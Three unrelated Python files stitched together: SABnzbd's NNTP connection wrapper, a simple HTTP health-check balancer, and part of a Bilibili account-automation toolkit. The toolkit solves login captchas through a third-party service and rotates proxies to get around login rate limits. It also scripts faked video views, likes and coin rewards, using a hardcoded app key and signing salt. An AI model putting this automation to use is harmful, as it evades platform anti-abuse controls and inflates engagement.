# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.newswrapper
"""
import errno
import socket
from threading import Thread
from nntplib import NNTPPermanentError
import time
import logging
import re
import select
import sabnzbd
from sabnzbd.constants import *
import sabnzbd.cfg
import threading
_RLock = threading.RLock
del threading
# Import SSL if available
if sabnzbd.HAVE_SSL:
import ssl
if sabnzbd.HAVE_SSL_CONTEXT:
WantReadError = ssl.SSLWantReadError
CertificateError = ssl.CertificateError
else:
WantReadError = ssl.SSLError
CertificateError = ssl.SSLError
else:
# Dummy class so this exception is ignored by clients without ssl installed
class WantReadError(Exception):
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
class CertificateError(Exception):
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
socket.setdefaulttimeout(DEF_TIMEOUT)
# getaddrinfo() can be very slow. In some situations this can lead
# to delayed starts and timeouts on connections.
# Because of this, the results will be cached in the server object.
def _retrieve_info(server):
""" Async attempt to run getaddrinfo() for specified server """
info = GetServerParms(server.host, server.port)
if info is None:
server.bad_cons += server.threads
else:
server.bad_cons = 0
(server.info, server.request) = (info, False)
sabnzbd.downloader.Downloader.do.wakeup()
def request_server_info(server):
""" Launch async request to resolve server address """
if not server.request:
server.request = True
Thread(target=_retrieve_info, args=(server,)).start()
def GetServerParms(host, port):
""" Return processed getaddrinfo() for server """
try:
int(port)
except:
port = 119
opt = sabnzbd.cfg.ipv6_servers()
''' ... with the following meaning for 'opt':
Control the use of IPv6 Usenet server addresses. Meaning:
0 = don't use
1 = use when available and reachable (DEFAULT)
2 = force usage (when SABnzbd's detection fails)
'''
try:
# Standard IPV4 or IPV6
ips = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
if opt == 2 or (opt == 1 and sabnzbd.EXTERNAL_IPV6) or (opt == 1 and sabnzbd.cfg.load_balancing() == 2):
# IPv6 forced by user, or IPv6 allowed and reachable, or IPv6 allowed and loadbalancing-with-IPv6 activated
# So return all IP addresses, no matter IPv4 or IPv6:
return ips
else:
# IPv6 unreachable or not allowed by user, so only return IPv4 address(es):
return [ip for ip in ips if ':' not in ip[4][0]]
except:
if opt == 2 or (opt == 1 and sabnzbd.EXTERNAL_IPV6) or (opt == 1 and sabnzbd.cfg.load_balancing() == 2):
try:
# Try IPV6 explicitly
return socket.getaddrinfo(host, port, socket.AF_INET6,
socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
except:
# Nothing found!
pass
return None
def get_ssl_version(sock):
# Python <2.7.9 doesn't have SSLConnection.version()
try:
return sock.version()
except:
# We can only give an estimation from the cipher
return sock.cipher()[1]
def con(sock, host, port, sslenabled, write_fds, nntp):
if 0: assert isinstance(nntp, NNTP) # Assert only for debug purposes
try:
sock.connect((host, port))
sock.setblocking(0)
if sslenabled and sabnzbd.HAVE_SSL:
# Log SSL/TLS info
logging.info("%s@%s: Connected using %s (%s)",
nntp.nw.thrdnum, nntp.nw.server.host, get_ssl_version(sock), sock.cipher()[0])
nntp.nw.server.ssl_info = "%s (%s)" % (get_ssl_version(sock), sock.cipher()[0])
# Now it's safe to add the socket to the list of active sockets.
# 'write_fds' is an attribute of the Downloader singleton.
# This direct access is needed to prevent multi-threading sync problems.
if write_fds is not None:
write_fds[sock.fileno()] = nntp.nw
except (ssl.SSLError, CertificateError) as e:
nntp.error(e)
except socket.error, e:
try:
# socket.error can either return a string or a tuple
if isinstance(e, tuple):
(_errno, strerror) = e
else:
# Are we safe to hardcode the ETIMEDOUT error?
(_errno, strerror) = (errno.ETIMEDOUT, str(e))
e = (_errno, strerror)
# expected, do nothing
if _errno == errno.EINPROGRESS:
pass
finally:
nntp.error(e)
def probablyipv4(ip):
if ip.count('.') == 3 and re.sub('[0123456789.]', '', ip) == '':
return True
else:
return False
def probablyipv6(ip):
if ip.count(':') >= 2 and re.sub('[0123456789abcdefABCDEF:]', '', ip) == '':
return True
else:
return False
class NNTP(object):
def __init__(self, host, port, info, sslenabled, send_group, nw, user=None, password=None, block=False, write_fds=None):
if 0: assert isinstance(nw, NewsWrapper) # Assert only for debug purposes
self.host = host
self.port = port
self.nw = nw
self.blocking = block
self.error_msg = None
if not info:
if block:
info = GetServerParms(host, port)
else:
raise socket.error(errno.EADDRNOTAVAIL, "Address not available - Check for internet or DNS problems")
af, socktype, proto, canonname, sa = info[0]
# there will be a connect to host (or self.host, so let's force set 'af' to the correct value
if probablyipv4(host):
af = socket.AF_INET
if probablyipv6(host):
af = socket.AF_INET6
if sslenabled and sabnzbd.HAVE_SSL:
# Use context or just wrapper
if sabnzbd.HAVE_SSL_CONTEXT:
# Setup the SSL socket
ctx = ssl.create_default_context()
# Only verify hostname when we're strict
if(nw.server.ssl_verify < 2):
ctx.check_hostname = False
# Certificates optional
if(nw.server.ssl_verify == 0):
ctx.verify_mode = ssl.CERT_NONE
# Did the user set a custom cipher-string?
if(sabnzbd.cfg.ssl_ciphers()):
# At their own risk, socket will error out in case it was invalid
ctx.set_ciphers(sabnzbd.cfg.ssl_ciphers())
self.sock = ctx.wrap_socket(socket.socket(af, socktype, proto), server_hostname=str(nw.server.host))
else:
# Ciphers have to be None, if set to empty-string it will fail on <2.7.9
ciphers = sabnzbd.cfg.ssl_ciphers() if sabnzbd.cfg.ssl_ciphers() else None
# Use a regular wrapper, no certificate validation
self.sock = ssl.wrap_socket(socket.socket(af, socktype, proto), ciphers=ciphers)
elif sslenabled and not sabnzbd.HAVE_SSL:
logging.error(T('Error importing OpenSSL module. Connecting with NON-SSL'))
self.sock = socket.socket(af, socktype, proto)
else:
self.sock = socket.socket(af, socktype, proto)
try:
# Open the connection in a separate thread due to avoid blocking
# For server-testing we do want blocking
if not block:
Thread(target=con, args=(self.sock, self.host, self.port, sslenabled, write_fds, self)).start()
else:
# if blocking (server test) only wait for 4 seconds during connect until timeout
self.sock.settimeout(4)
self.sock.connect((self.host, self.port))
if sslenabled and sabnzbd.HAVE_SSL:
# Log SSL/TLS info
logging.info("%s@%s: Connected using %s (%s)",
self.nw.thrdnum, self.nw.server.host, get_ssl_version(self.sock), self.sock.cipher()[0])
self.nw.server.ssl_info = "%s (%s)" % (get_ssl_version(self.sock), self.sock.cipher()[0])
except (ssl.SSLError, CertificateError) as e:
self.error(e)
except socket.error, e:
try:
# socket.error can either return a string or a tuple
if isinstance(e, tuple):
(_errno, strerror) = e
else:
# Are we safe to hardcode the ETIMEDOUT error?
(_errno, strerror) = (errno.ETIMEDOUT, str(e))
e = (_errno, strerror)
# expected, do nothing
if _errno == errno.EINPROGRESS:
pass
finally:
self.error(e)
def error(self, error):
if 'SSL23_GET_SERVER_HELLO' in str(error) or 'SSL3_GET_RECORD' in str(error):
error = T('This server does not allow SSL on this port')
# Catch certificate errors
if type(error) == CertificateError or 'CERTIFICATE_VERIFY_FAILED' in str(error):
error = T('Server %s uses an untrusted certificate [%s]') % (self.nw.server.host, str(error))
# Prevent throwing a lot of errors or when testing server
if error not in self.nw.server.warning and self.nw.server.id != -1:
logging.error(error)
msg = "Failed to connect: %s" % (str(error))
msg = "%s %s@%s:%s" % (msg, self.nw.thrdnum, self.host, self.port)
self.error_msg = msg
if self.blocking:
raise socket.error(errno.ECONNREFUSED, msg)
else:
logging.info(msg)
self.nw.server.warning = msg
class NewsWrapper(object):
def __init__(self, server, thrdnum, block=False):
self.server = server
self.thrdnum = thrdnum
self.blocking = block
self.timeout = None
self.article = None
self.data = ''
self.lines = []
self.nntp = None
self.recv = None
self.connected = False
self.user_sent = False
self.pass_sent = False
self.group = None
self.user_ok = False
self.pass_ok = False
self.force_login = False
def init_connect(self, write_fds):
self.nntp = NNTP(self.server.hostip, self.server.port, self.server.info, self.server.ssl,
self.server.send_group, self, self.server.username, self.server.password,
self.blocking, write_fds)
self.recv = self.nntp.sock.recv
self.timeout = time.time() + self.server.timeout
def finish_connect(self, code):
if not (self.server.username or self.server.password or self.force_login):
self.connected = True
self.user_sent = True
self.user_ok = True
self.pass_sent = True
self.pass_ok = True
if code in ('501',) and self.user_sent:
# Change to a sensible text
code = '481'
self.lines[0] = T('Authentication failed, check username/password.')
self.user_ok = True
self.pass_sent = True
if code == '480':
self.force_login = True
self.connected = False
self.user_sent = False
self.user_ok = False
self.pass_sent = False
self.pass_ok = False
if code in ('400', '502'):
raise NNTPPermanentError(self.lines[0])
elif not self.user_sent:
command = 'authinfo user %s\r\n' % self.server.username
self.nntp.sock.sendall(command)
self.user_sent = True
elif not self.user_ok:
if code == '381':
self.user_ok = True
elif code == '281':
# No login required
self.user_ok = True
self.pass_sent = True
self.pass_ok = True
self.connected = True
if self.user_ok and not self.pass_sent:
command = 'authinfo pass %s\r\n' % self.server.password
self.nntp.sock.sendall(command)
self.pass_sent = True
elif self.user_ok and not self.pass_ok:
if code != '281':
# Assume that login failed (code 481 or other)
raise NNTPPermanentError(self.lines[0])
else:
self.connected = True
self.timeout = time.time() + self.server.timeout
def body(self, precheck):
self.timeout = time.time() + self.server.timeout
if precheck:
if self.server.have_stat:
command = 'STAT <%s>\r\n' % (self.article.article)
else:
command = 'HEAD <%s>\r\n' % (self.article.article)
elif self.server.have_body:
command = 'BODY <%s>\r\n' % (self.article.article)
else:
command = 'ARTICLE <%s>\r\n' % (self.article.article)
self.nntp.sock.sendall(command)
def send_group(self, group):
self.timeout = time.time() + self.server.timeout
command = 'GROUP %s\r\n' % (group)
self.nntp.sock.sendall(command)
def recv_chunk(self, block=False):
""" Receive data, return #bytes, done, skip """
self.timeout = time.time() + self.server.timeout
while 1:
try:
if self.nntp.nw.server.ssl:
# SSL chunks come in 16K frames
# Setting higher limits results in slowdown
chunk = self.recv(16384)
else:
# Get as many bytes as possible
chunk = self.recv(262144)
break
except WantReadError as e:
# Workaround for Python <2.7.9 so we only catch WantReadError's
if not sabnzbd.HAVE_SSL_CONTEXT and e.errno != 2:
raise
# SSL connections will block until they are ready.
# Either ignore the connection until it responds
# Or wait in a loop until it responds
if block:
# time.sleep(0.0001)
continue
else:
return (0, False, True)
self.data += chunk
new_lines = self.data.split('\r\n')
# See if incorrect newline-only was used
# Do this as a special case to prevent using extra memory
# for normal articles
if len(new_lines) == 1 and '\r' not in self.data:
new_lines = self.data.split('\n')
self.data = new_lines.pop()
# Already remove the starting dots
for i in xrange(len(new_lines)):
if new_lines[i][:2] == '..':
new_lines[i] = new_lines[i][1:]
self.lines.extend(new_lines)
if self.lines and self.lines[-1] == '.':
self.lines = self.lines[1:-1]
return (len(chunk), True, False)
else:
return (len(chunk), False, False)
def soft_reset(self):
self.timeout = None
self.article = None
self.data = ''
self.lines = []
def hard_reset(self, wait=True, quit=True):
if self.nntp:
try:
if quit:
self.nntp.sock.sendall('QUIT\r\n')
time.sleep(0.1)
self.nntp.sock.close()
except:
pass
self.__init__(self.server, self.thrdnum)
# Wait before re-using this newswrapper
if wait:
# Reset due to error condition, use server timeout
self.timeout = time.time() + self.server.timeout
else:
# Reset for internal reasons, just wait 5 sec
self.timeout = time.time() + 5
def terminate(self, quit=False):
""" Close connection and remove nntp object """
if self.nntp:
try:
if quit:
self.nntp.sock.sendall('QUIT\r\n')
time.sleep(0.1)
self.nntp.sock.close()
except:
pass
del self.nntp
|
sfor_simple.py
|
# -*- coding: utf-8 -*-
import logging
import time
import datetime
import httplib
import random
from threading import Thread, Lock
class SforNodeInfo:
def __init__(self, host, port, check_path):
self.host = host
self.port = port
self.check_path = check_path
self.status = True
self.lock = Lock()
def disable(self):
with self.lock:
self.status = False
def enable(self):
with self.lock:
self.status = True
def backend_check(check_list, loop=True, wait_time=15, http_timeout=3):
while True:
for n in check_list:
conn = httplib.HTTPConnection(n.host, n.port, timeout=http_timeout)
status = False
try:
conn.request("GET", n.check_path)
res = conn.getresponse()
status = res.status / 100 == 2
except:
status = False
if status == False:
logging.info("sfor disable %s" % n.host)
n.disable()
else:
logging.info("sfor enable %s" % n.host)
n.enable()
logging.debug("sfor %s res: %d" % (n.host, n.status))
if loop == False:
break
else:
time.sleep(wait_time)
class SforSimple:
def __init__(self, node_list):
self.node_list = node_list
logging.debug("initial check start.")
backend_check(node_list, False)
logging.debug("initial check finish.")
th = Thread(target=backend_check, args=(node_list,))
th.daemon = True
th.start()
def resolv(self):
node_list = self.node_list
rnd = random.randint(0, len(node_list) - 1)
for i in range(len(node_list)):
n = (i + rnd) % len(node_list)
info = node_list[n]
stat = info.status
if stat == True:
return info.host
return None
|
bilibiliapi.py
|
#!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
"""Bilibili Toolkit 哔哩哔哩工具箱
https://github.com/Hsury/Bilibili-Toolkit"""
banner = r"""
\\ //
\\ //
##################### ________ ___ ___ ___ ________ ___ ___ ___
## ## |\ __ \ |\ \ |\ \ |\ \ |\ __ \ |\ \ |\ \ |\ \
## // \\ ## \ \ \|\ /_\ \ \\ \ \ \ \ \\ \ \|\ /_\ \ \\ \ \ \ \ \
## // \\ ## \ \ __ \\ \ \\ \ \ \ \ \\ \ __ \\ \ \\ \ \ \ \ \
## ## \ \ \|\ \\ \ \\ \ \____ \ \ \\ \ \|\ \\ \ \\ \ \____ \ \ \
## www ## \ \_______\\ \__\\ \_______\\ \__\\ \_______\\ \__\\ \_______\\ \__\
## ## \|_______| \|__| \|_______| \|__| \|_______| \|__| \|_______| \|__|
#####################
\/ \/ 哔哩哔哩 (゜-゜)つロ 干杯~
"""
import base64
import chardet
import functools
import hashlib
import json
import os
import platform
import random
import requests
import rsa
import shutil
import subprocess
import sys
import threading
import time
from multiprocessing import freeze_support, Manager, Pool, Process
from urllib import parse
__author__ = "Hsury"
__email__ = "i@hsury.com"
__license__ = "SATA"
__version__ = "2020.7.20"
class Bilibili:
app_key = "bca7e84c2d947ac6"
patterns = {
'video': {
'id': 1,
'prefix': "https://www.bilibili.com/video/av",
},
'activity': {
'id': 4,
'prefix': "https://www.bilibili.com/blackboard/",
},
'gallery': {
'id': 11,
'prefix': "https://h.bilibili.com/",
},
'article': {
'id': 12,
'prefix': "https://www.bilibili.com/read/cv",
},
}
def __init__(self, https=True, queue=None):
self._session = requests.Session()
self._session.headers.update({'User-Agent': "Mozilla/5.0 BiliDroid/6.4.0 (bbcallen@gmail.com) os/android model/M1903F11I mobi_app/android build/6040500 channel/bili innerVer/6040500 osVer/9.0.0 network/2"})
self.__queue = queue
self.get_cookies = lambda: self._session.cookies.get_dict(domain=".bilibili.com")
self.get_csrf = lambda: self.get_cookies().get("bili_jct", "")
self.get_sid = lambda: self.get_cookies().get("sid", "")
self.get_uid = lambda: self.get_cookies().get("DedeUserID", "")
self.access_token = ""
self.refresh_token = ""
self.username = ""
self.password = ""
self.info = {
'ban': False,
'coins': 0,
'experience': {
'current': 0,
'next': 0,
},
'face': "",
'level': 0,
'nickname': "",
}
self.protocol = "https" if https else "http"
self.proxy = None
self.proxy_pool = set()
def _log(self, message):
log = f"[{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))}][{self.username if self.username else '#' + self.get_uid() if self.get_uid() else ''}] {message}"
print(log)
self.__push_to_queue("log", log)
def _requests(self, method, url, decode_level=2, enable_proxy=True, retry=10, timeout=15, **kwargs):
if method in ["get", "post"]:
for _ in range(retry + 1):
try:
response = getattr(self._session, method)(url, timeout=timeout, proxies=self.proxy if enable_proxy else None, **kwargs)
return response.json() if decode_level == 2 else response.content if decode_level == 1 else response
except:
if enable_proxy:
self.set_proxy()
return None
def _solve_captcha(self, image):
url = "https://bili.dev:2233/captcha"
payload = {'image': base64.b64encode(image).decode("utf-8")}
response = self._requests("post", url, json=payload)
return response['message'] if response and response.get("code") == 0 else None
def __bvid_handle(args_index=None, kwargs_key="aid"):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
if args_index is not None and args_index < len(args):
result = Bilibili.bvid_to_aid(args[args_index])
if result:
args = list(args)
self._log(f"{args[args_index]}被自动转换为av{result}")
args[args_index] = result
if kwargs_key is not None and kwargs_key in kwargs:
result = Bilibili.bvid_to_aid(kwargs[kwargs_key])
if result:
self._log(f"{kwargs[kwargs_key]}被自动转换为av{result}")
kwargs[kwargs_key] = result
return func(*args, **kwargs)
return wrapper
return decorator
def __push_to_queue(self, manufacturer, data):
if self.__queue:
self.__queue.put({
'uid': self.get_uid(),
'time': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())),
'manufacturer': manufacturer,
'data': data,
})
@staticmethod
def bvid_to_aid(bvid="BV17x411w7KC"):
# Snippet source: https://www.zhihu.com/question/381784377/answer/1099438784
table = "fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF"
tr = {}
for i in range(58):
tr[table[i]] = i
s = [11, 10, 3, 8, 4, 6]
xor = 177451812
add = 8728348608
r = 0
try:
for i in range(6):
r += tr[bvid[s[i]]] * 58 ** i
return (r - add) ^ xor
except:
return None
@staticmethod
def calc_sign(param):
salt = "60698ba2f68e01ce44738920a0ffe768"
sign_hash = hashlib.md5()
sign_hash.update(f"{param}{salt}".encode())
return sign_hash.hexdigest()
def set_proxy(self, add=None):
if isinstance(add, str):
self.proxy_pool.add(add)
elif isinstance(add, list):
self.proxy_pool.update(add)
if self.proxy_pool:
proxy = random.sample(self.proxy_pool, 1)[0]
self.proxy = {self.protocol: f"{self.protocol}://{proxy}"}
# self._log(f"使用{self.protocol.upper()}代理: {proxy}")
else:
self.proxy = None
return self.proxy
# 登录
def login(self, **kwargs):
def by_cookie():
url = f"{self.protocol}://api.bilibili.com/x/space/myinfo"
headers = {'Host': "api.bilibili.com"}
response = self._requests("get", url, headers=headers)
if response and response.get("code") != -101:
self._log("Cookie仍有效")
return True
else:
self._log("Cookie已失效")
return False
def by_token(force_refresh=False):
if not force_refresh:
param = f"access_key={self.access_token}&appkey={Bilibili.app_key}&ts={int(time.time())}"
url = f"{self.protocol}://passport.bilibili.com/api/v2/oauth2/info?{param}&sign={self.calc_sign(param)}"
response = self._requests("get", url)
if response and response.get("code") == 0:
self._session.cookies.set('DedeUserID', str(response['data']['mid']), domain=".bilibili.com")
self._log(f"Token仍有效, 有效期至{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time() + int(response['data']['expires_in'])))}")
param = f"access_key={self.access_token}&appkey={Bilibili.app_key}&gourl={self.protocol}%3A%2F%2Faccount.bilibili.com%2Faccount%2Fhome&ts={int(time.time())}"
url = f"{self.protocol}://passport.bilibili.com/api/login/sso?{param}&sign={self.calc_sign(param)}"
self._requests("get", url, decode_level=0)
if all(key in self.get_cookies() for key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"]):
self._log("Cookie获取成功")
return True
else:
self._log("Cookie获取失败")
url = f"{self.protocol}://passport.bilibili.com/api/v2/oauth2/refresh_token"
param = f"access_key={self.access_token}&appkey={Bilibili.app_key}&refresh_token={self.refresh_token}&ts={int(time.time())}"
payload = f"{param}&sign={self.calc_sign(param)}"
headers = {'Content-type': "application/x-www-form-urlencoded"}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
for cookie in response['data']['cookie_info']['cookies']:
self._session.cookies.set(cookie['name'], cookie['value'], domain=".bilibili.com")
self.access_token = response['data']['token_info']['access_token']
self.refresh_token = response['data']['token_info']['refresh_token']
self._log(f"Token刷新成功, 有效期至{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time() + int(response['data']['token_info']['expires_in'])))}")
return True
else:
self.access_token = ""
self.refresh_token = ""
self._log("Token刷新失败")
return False
def by_password():
def get_key():
url = f"{self.protocol}://passport.bilibili.com/api/oauth2/getKey"
payload = {
'appkey': Bilibili.app_key,
'sign': self.calc_sign(f"appkey={Bilibili.app_key}"),
}
while True:
response = self._requests("post", url, data=payload)
if response and response.get("code") == 0:
return {
'key_hash': response['data']['hash'],
'pub_key': rsa.PublicKey.load_pkcs1_openssl_pem(response['data']['key'].encode()),
}
else:
time.sleep(1)
while True:
key = get_key()
key_hash, pub_key = key['key_hash'], key['pub_key']
url = f"{self.protocol}://passport.bilibili.com/api/v2/oauth2/login"
param = f"appkey={Bilibili.app_key}&password={parse.quote_plus(base64.b64encode(rsa.encrypt(f'{key_hash}{self.password}'.encode(), pub_key)))}&username={parse.quote_plus(self.username)}"
payload = f"{param}&sign={self.calc_sign(param)}"
headers = {'Content-type': "application/x-www-form-urlencoded"}
response = self._requests("post", url, data=payload, headers=headers)
while True:
if response and response.get("code") is not None:
if response['code'] == -105:
url = f"{self.protocol}://passport.bilibili.com/captcha"
headers = {'Host': "passport.bilibili.com"}
response = self._requests("get", url, headers=headers, decode_level=1)
captcha = self._solve_captcha(response)
if captcha:
self._log(f"登录验证码识别结果: {captcha}")
key = get_key()
key_hash, pub_key = key['key_hash'], key['pub_key']
url = f"{self.protocol}://passport.bilibili.com/api/v2/oauth2/login"
param = f"appkey={Bilibili.app_key}&captcha={captcha}&password={parse.quote_plus(base64.b64encode(rsa.encrypt(f'{key_hash}{self.password}'.encode(), pub_key)))}&username={parse.quote_plus(self.username)}"
payload = f"{param}&sign={self.calc_sign(param)}"
headers = {'Content-type': "application/x-www-form-urlencoded"}
response = self._requests("post", url, data=payload, headers=headers)
else:
self._log(f"登录验证码识别服务暂时不可用, {'尝试更换代理' if self.proxy else '10秒后重试'}")
if not self.set_proxy():
time.sleep(10)
break
elif response['code'] == -449:
self._log("服务繁忙, 尝试使用V3接口登录")
url = f"{self.protocol}://passport.bilibili.com/api/v3/oauth2/login"
param = f"access_key=&actionKey=appkey&appkey={Bilibili.app_key}&build=6040500&captcha=&challenge=&channel=bili&cookies=&device=phone&mobi_app=android&password={parse.quote_plus(base64.b64encode(rsa.encrypt(f'{key_hash}{self.password}'.encode(), pub_key)))}&permission=ALL&platform=android&seccode=&subid=1&ts={int(time.time())}&username={parse.quote_plus(self.username)}&validate="
payload = f"{param}&sign={self.calc_sign(param)}"
headers = {'Content-type': "application/x-www-form-urlencoded"}
response = self._requests("post", url, data=payload, headers=headers)
elif response['code'] == 0 and response['data']['status'] == 0:
for cookie in response['data']['cookie_info']['cookies']:
self._session.cookies.set(cookie['name'], cookie['value'], domain=".bilibili.com")
self.access_token = response['data']['token_info']['access_token']
self.refresh_token = response['data']['token_info']['refresh_token']
self._log("登录成功")
return True
else:
self._log(f"登录失败 {response}")
return False
else:
self._log(f"当前IP登录过于频繁, {'尝试更换代理' if self.proxy else '1分钟后重试'}")
if not self.set_proxy():
time.sleep(60)
break
self._session.cookies.clear()
for name in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"]:
value = kwargs.get(name)
if value:
self._session.cookies.set(name, value, domain=".bilibili.com")
self.access_token = kwargs.get("access_token", "")
self.refresh_token = kwargs.get("refresh_token", "")
self.username = kwargs.get("username", "")
self.password = kwargs.get("password", "")
force_refresh_token = kwargs.get("force_refresh_token", False)
if (not force_refresh_token or not self.access_token or not self.refresh_token) and all(key in self.get_cookies() for key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"]) and by_cookie():
return True
elif self.access_token and self.refresh_token and by_token(force_refresh_token):
return True
elif self.username and self.password and by_password():
return True
else:
self._session.cookies.clear()
return False
# 获取用户信息
def get_user_info(self):
url = f"{self.protocol}://api.bilibili.com/x/space/myinfo?jsonp=jsonp"
headers = {
'Host': "api.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
self.info['ban'] = bool(response['data']['silence'])
self.info['coins'] = response['data']['coins']
self.info['experience']['current'] = response['data']['level_exp']['current_exp']
self.info['experience']['next'] = response['data']['level_exp']['next_exp']
self.info['face'] = response['data']['face']
self.info['level'] = response['data']['level']
self.info['nickname'] = response['data']['name']
self._log(f"{self.info['nickname']}(UID={self.get_uid()}), Lv.{self.info['level']}({self.info['experience']['current']}/{self.info['experience']['next']}), 拥有{self.info['coins']}枚硬币, 账号{'状态正常' if not self.info['ban'] else '被封禁'}")
return True
else:
self._log("用户信息获取失败")
return False
# 修改隐私设置
def set_privacy(self, show_favourite=None, show_bangumi=None, show_tag=None, show_reward=None, show_info=None, show_game=None):
# show_favourite = 展示[我的收藏夹]
# show_bangumi = 展示[订阅番剧]
# show_tag = 展示[订阅标签]
# show_reward = 展示[最近投币的视频]
# show_info = 展示[个人资料]
# show_game = 展示[最近玩过的游戏]
privacy = {
'fav_video': show_favourite,
'bangumi': show_bangumi,
'tags': show_tag,
'coins_video': show_reward,
'user_info': show_info,
'played_game': show_game,
}
url = f"{self.protocol}://space.bilibili.com/ajax/settings/getSettings?mid={self.get_uid()}"
headers = {
'Host': "space.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/",
}
response = self._requests("get", url, headers=headers)
if response and response.get("status") == True:
for key, value in privacy.items():
if response['data']['privacy'][key] == value:
privacy[key] = None
else:
self._log(f"隐私设置获取失败 {response}")
return False
url = f"{self.protocol}://space.bilibili.com/ajax/settings/setPrivacy"
headers = {
'Host': "space.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/",
}
fail = []
for key, value in privacy.items():
if value is not None:
payload = {
key: 1 if value else 0,
'csrf': self.get_csrf(),
}
response = self._requests("post", url, data=payload, headers=headers)
if not response or response.get("status") != True:
fail.append(key)
if not fail:
self._log("隐私设置修改成功")
return True
else:
self._log(f"隐私设置修改失败 {fail}")
return False
# 银瓜子兑换硬币
def silver_to_coin(self, app=True, pc=False):
# app = APP通道
# pc = PC通道
if app:
param = f"access_key={self.access_token}&appkey={Bilibili.app_key}&ts={int(time.time())}"
url = f"{self.protocol}://api.live.bilibili.com/AppExchange/silver2coin?{param}&sign={self.calc_sign(param)}"
response = self._requests("get", url)
if response and response.get("code") == 0:
self._log("银瓜子兑换硬币(APP通道)成功")
else:
self._log(f"银瓜子兑换硬币(APP通道)失败 {response}")
if pc:
url = f"{self.protocol}://api.live.bilibili.com/pay/v1/Exchange/silver2coin"
payload = {
'platform': "pc",
'csrf_token': self.get_csrf(),
}
headers = {
'Host': "api.live.bilibili.com",
'Origin': "https://live.bilibili.com",
'Referer': "https://live.bilibili.com/exchange",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log("银瓜子兑换硬币(PC通道)成功")
else:
self._log(f"银瓜子兑换硬币(PC通道)失败 {response}")
# 观看
@__bvid_handle(1, "aid")
def watch(self, aid):
# aid = 稿件av号
url = f"{self.protocol}://api.bilibili.com/x/web-interface/view?aid={aid}"
response = self._requests("get", url)
if response and response.get("data") is not None:
cid = response['data']['cid']
duration = response['data']['duration']
else:
self._log(f"av{aid}信息解析失败")
return False
url = f"{self.protocol}://api.bilibili.com/x/report/click/h5"
payload = {
'aid': aid,
'cid': cid,
'part': 1,
'did': self.get_sid(),
'ftime': int(time.time()),
'jsonp': "jsonp",
'lv': None,
'mid': self.get_uid(),
'csrf': self.get_csrf(),
'stime': int(time.time()),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
url = f"{self.protocol}://api.bilibili.com/x/report/web/heartbeat"
payload = {
'aid': aid,
'cid': cid,
'jsonp': "jsonp",
'mid': self.get_uid(),
'csrf': self.get_csrf(),
'played_time': 0,
'pause': False,
'realtime': duration,
'dt': 7,
'play_type': 1,
'start_ts': int(time.time()),
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
time.sleep(5)
payload['played_time'] = duration - 1
payload['play_type'] = 0
payload['start_ts'] = int(time.time())
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}观看成功")
return True
self._log(f"av{aid}观看失败 {response}")
return False
# 点赞
@__bvid_handle(1, "aid")
def like(self, aid):
# aid = 稿件av号
url = f"{self.protocol}://api.bilibili.com/x/web-interface/archive/like"
payload = {
'aid': aid,
'like': 1,
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}点赞成功")
return True
else:
self._log(f"av{aid}点赞失败 {response}")
return False
# 投币
@__bvid_handle(1, "aid")
def reward(self, aid, double=True):
# aid = 稿件av号
# double = 双倍投币
url = f"{self.protocol}://api.bilibili.com/x/web-interface/coin/add"
payload = {
'aid': aid,
'multiply': 2 if double else 1,
'cross_domain': "true",
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"av{aid}投{2 if double else 1}枚硬币成功")
return True
else:
self._log(f"av{aid}投{2 if double else 1}枚硬币失败 {response}")
return self.reward(aid, False) if double else False
# 收藏
@__bvid_handle(1, "aid")
def favour(self, aid):
# aid = 稿件av号
url = f"{self.protocol}://api.bilibili.com/x/v2/fav/folder"
headers = {'Host': "api.bilibili.com"}
response = self._requests("get", url, headers=headers)
if response and response.get("data"):
fid = response['data'][0]['fid']
else:
self._log("fid获取失败")
return False
url = f"{self.protocol}://api.bilibili.com/x/v2/fav/video/add"
payload = {
'aid': aid,
'fid': fid,
'jsonp': "jsonp",
'csrf': self.get_csrf(),
}
headers = {
'Host': "api.bilibili.com",
'Origin': "https://www.bilibili.com",
'Referer': f"https://www.bilibili.com/video/av{aid}",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
